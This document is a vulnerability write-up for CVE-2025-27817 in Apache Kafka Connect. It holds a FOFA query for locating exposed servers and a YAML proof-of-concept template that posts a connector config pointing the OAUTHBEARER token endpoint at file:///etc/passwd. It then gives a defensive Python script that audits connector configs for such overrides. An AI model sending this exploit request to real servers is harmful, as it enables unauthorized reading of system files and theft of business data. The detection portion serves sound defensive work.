Vulnerability description
Allows an unauthenticated attacker to exploit this vulnerability to read arbitrary files. Most data-processing middleware and stream-processing frameworks, such as Apache Spark Structured Streaming and Apache Druid, need to call the Kafka Connect component from their applications, and these services store large amounts of sensitive data from core business systems; once attacked, the resulting data leak is all the more serious.
FOFA query: header="Jetty" && body="kafka_cluster_id"
id: CVE-2025-27817

info:
  name: Apache Kafka client arbitrary file read
  author: avic123
  severity: high
  verified: true
  description: |
    Allows an unauthenticated attacker to exploit this vulnerability to read arbitrary files. Most data-processing middleware and stream-processing frameworks, such as Apache Spark Structured Streaming and Apache Druid, need to call the Kafka Connect component from their applications, and these services store large amounts of sensitive data from core business systems; once attacked, the resulting data leak is all the more serious.
    fofa: header="Jetty" && body="kafka_cluster_id"
  reference:
    - https://mp.weixin.qq.com/s/z7Ppzv1k8flAXZiLQo9SSw
  created: 2025/06/13

rules:
  r0:
    request:
      method: POST
      path: /connectors
      headers:
        Content-Type: application/json
      body: |
        {
          "name": "malicious-connector",
          "config": {
            "connector.class": "org.apache.kafka.connect.mirror.MirrorHeartbeatConnector",
            "tasks.max": "1",
            "source.cluster.alias": "source-0",
            "target.cluster.alias": "target-0",
            "source.cluster.bootstrap.servers": "127.0.0.1:9092",
            "target.cluster.bootstrap.servers": "127.0.0.1:9092",
            "producer.override.sasl.oauthbearer.token.endpoint.url": "file:///etc/passwd",
            "producer.override.sasl.login.callback.handler.class": "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginCallbackHandler",
            "producer.override.sasl.jaas.config": "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required serviceName=\"exploit\";",
            "producer.override.sasl.mechanism": "OAUTHBEARER",
            "value.converter": "org.apache.kafka.connect.converters.ByteArrayConverter",
            "key.converter": "org.apache.kafka.connect.converters.ByteArrayConverter"
          }
        }
    expression: >-
      response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)

expression: r0()
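The request body above shows what the abuse looks like from the Kafka Connect side: a connector-level client override pointing `sasl.oauthbearer.token.endpoint.url` at a `file://` URL. The following defender-side check is an added example, not part of this PoC template or of the Kafka project. It walks connector configurations (a name-to-config mapping such as you would assemble from `GET /connectors` followed by `GET /connectors/{name}/config`) and flags any OAUTHBEARER token endpoint whose scheme is not `http`/`https`, plus any case where that login setting is set through one of Connect's client override prefixes (`producer.override.`, `consumer.override.`, `admin.override.`). The sample connector data is constructed for the example.

```python
"""Added example: audit Kafka Connect connector configs for abusable OAUTHBEARER token endpoints."""
import json
from urllib.parse import urlparse

# Key that the OAuthBearerLoginCallbackHandler fetches a token from; it may appear
# bare or behind a Connect client-override prefix, as in the PoC body.
TOKEN_ENDPOINT_SUFFIX = "sasl.oauthbearer.token.endpoint.url"
CLIENT_OVERRIDE_PREFIXES = ("producer.override.", "consumer.override.", "admin.override.")
ALLOWED_SCHEMES = {"http", "https"}


def check_connector_config(config: dict) -> list[dict]:
    """Return one finding dict per suspicious token-endpoint setting in a single connector config."""
    findings = []
    for key, value in config.items():
        if not key.endswith(TOKEN_ENDPOINT_SUFFIX):
            continue
        prefix = key[: len(key) - len(TOKEN_ENDPOINT_SUFFIX)]
        if prefix not in ("",) + CLIENT_OVERRIDE_PREFIXES:
            continue  # some other key that merely ends with the same string; clients ignore it
        scheme = urlparse(str(value)).scheme.lower()
        if scheme not in ALLOWED_SCHEMES:
            # file://, or a bare path, is the pattern behind the arbitrary file read
            findings.append({
                "key": key,
                "value": value,
                "severity": "high",
                "reason": f"token endpoint uses non-http scheme {scheme or '<none>'!r}",
            })
        elif prefix:
            # http(s) is fine, but SASL login settings overridden per connector still deserve review
            findings.append({
                "key": key,
                "value": value,
                "severity": "medium",
                "reason": "SASL login settings overridden at connector level",
            })
    return findings


def scan_connectors(connectors_json: str) -> dict[str, list[dict]]:
    """Parse a JSON object {connector_name: config} and return findings keyed by connector name."""
    connectors = json.loads(connectors_json)
    report = {}
    for name, config in connectors.items():
        findings = check_connector_config(config)
        if findings:
            report[name] = findings
    return report


# Constructed sample: one benign connector, one mirroring the PoC body, one with a per-connector
# override that points at a plausible https endpoint (hypothetical host).
SAMPLE_CONNECTORS = json.dumps({
    "orders-sink": {
        "connector.class": "FileStreamSink",
        "tasks.max": "1",
        "topics": "orders",
    },
    "malicious-connector": {
        "connector.class": "org.apache.kafka.connect.mirror.MirrorHeartbeatConnector",
        "producer.override.sasl.mechanism": "OAUTHBEARER",
        "producer.override.sasl.oauthbearer.token.endpoint.url": "file:///etc/passwd",
    },
    "partner-mirror": {
        "connector.class": "org.apache.kafka.connect.mirror.MirrorSourceConnector",
        "producer.override.sasl.oauthbearer.token.endpoint.url": "https://idp.example.invalid/token",
    },
})

if __name__ == "__main__":
    for connector, findings in scan_connectors(SAMPLE_CONNECTORS).items():
        for f in findings:
            print(f"[{f['severity']}] {connector}: {f['key']}={f['value']} ({f['reason']})")
```

Running it against the sample reports `malicious-connector` as high and `partner-mirror` as medium, and stays silent on `orders-sink`. On the worker side, the Connect setting `connector.client.config.override.policy` (values `All`, `Principal`, `None`) controls whether connectors may override client settings at all; with the default `All`, the override in the PoC body is accepted, so this audit is most useful on workers that cannot yet be tightened or upgraded.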